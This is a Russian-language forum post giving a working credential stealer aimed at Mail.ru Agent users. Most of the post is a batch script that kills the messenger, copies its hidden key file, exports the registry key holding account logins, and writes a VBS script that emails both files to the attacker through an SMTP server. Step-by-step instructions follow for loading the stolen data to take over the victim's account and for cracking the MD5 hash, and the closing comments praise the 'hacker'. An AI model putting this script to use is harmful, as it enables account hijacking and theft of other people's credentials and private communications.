Как украсть логин и пароль от майл агента
-
расскажу о способе кражи паролей от программы Mail.ru Agent. Может быть на сайте уже рассказывалось об этом способе, но все-же напишу так-как делать нечего:D:
Маил.ру агент хранит пароли в 2 файлах, а точнее инфу о пользователях в реестре, и фаил ключа (шифр) в папке Учетных записей- Реестр HKEY_CURRENT_USER\Software\Mail.Ru\Agent\magent_logins3
- Папка учетных записей (и сразу путь к нужной папке) %appdata%\Mra\Update
Собстно код:@echo off
taskkill /f /im «magent.exe»
attrib -h -s «%appdata%\mra\update\ver.txt»
ping 127.0.0.1 -n 5 >nul
copy «%appdata%\Mra\Update\ver.txt» «%windir%\keyn.txt»
ping 127.0.0.1 -n 5 >nul
attrib +h +s «%appdata%\mra\update\ver.txt»
regedit.exe -ea %windir%\keym.reg HKEY_CURRENT_USER\Software\Mail.Ru\Agent\magent_logins3
echo create script
echo Set objMessage = CreateObject(«CDO.Message») >> step2.vbs
echo objMessage.Subject = «PassGraber by WishNine» >> step2.vbs
echo objMessage.Sender = «e-mail адрес» >> step2.vbs
echo objMessage.To = «e-mail адрес кому придет пароль» >> step2.vbs
echo objMessage.TextBody = «%userdomain%» >> step2.vbs
echo objMessage.AddAttachment «%windir%\keym.reg» >> step2.vbs
echo objMessage.AddAttachment «%windir%\keyn.txt» >> step2.vbs
echo objMessage.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2 >> step2.vbs
echo objMessage.Configuration.Fields.Item («http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1 >> step2.vbs
echo objMessage.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = «адрес smtp сервера» >> step2.vbs
echo objMessage.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25 (порт) >> step2.vbs
echo objMessage.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = «e-mail адрес» >> step2.vbs
echo objMessage.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = «пароль от почты» >> step2.vbs
echo objMessage.Configuration.Fields.Update >> step2.vbs
echo objMessage.Send >> step2.vbs
ping 127.0.0.1 -n 5 >nul
step2.vbs
del step2.vbs
«%programfiles%\mail.ru\agent\magent.exe»
«%appdata%\mail.ru\agent\magent.exe»
Выключается сам процесс Агента «magent.exe»
Снимаются атрибуты -hs с файла «ключа» ver.txt
Проходит 5 сек (хз зачем но без этого иногда не срабатывает)
Копируется файл ver.txt в папку Windows с именем keyn.txt
Снова ставятся атрибуты +hs
Проходит 5 сек
Экспорт каталога реестра с учетными записями в Windows с именем keym.reg
Далее создается vbs скрипт отправки файлов keyn.txt и keym.reg по электронной почте.
e-mail адрес указываем «свой» ну или создаем левое мыло для этого чуда
e-mail адрес кому придет пароль указываем свой e-mail куда придут эти файлы
адрес smtp сервера Указываем адрес если Yandex то smtp.yandex.ru если mail.ru то smtp.mail.ru и тд.
25 (порт) указываем 25, вроде стандартный:D:
e-mail адрес указываем e-mail до собаки т.е если [email protected] то указываем Superhacker.
пароль от почты пароль от вашей почты, от левого ящика.
Проходит 5 сек
Снова запускается процесс «magent.exe»
Что теперь делать?
к вам на ящик придет письмо с 2-мя вложениями. Мой скрин.
Далее заходите в агент удаляете свою учетную запись.
запускаете файл keym.reg (он внесет «чужие данные» в агент
Далее переименовываете файл keyn.txt в key.txt и копируете (заменяете) его в %appdata%\Mra\Update (с выключенным агентом, так-как с включенным не скопирует (не заменит)
Включаете агент, и вуаля! Вы зашли в чужой профиль.
К сожалению пароль узнать «не получиться» почему в скобках? потому-что полученный из 2 файлов (реестр+шифр) мы получим md5 ключ. Но некоторые пароли узнать можно с помощью программы DeCryptICQ
**от + не откажусь **
-
взломщик
-
молорик пацанчк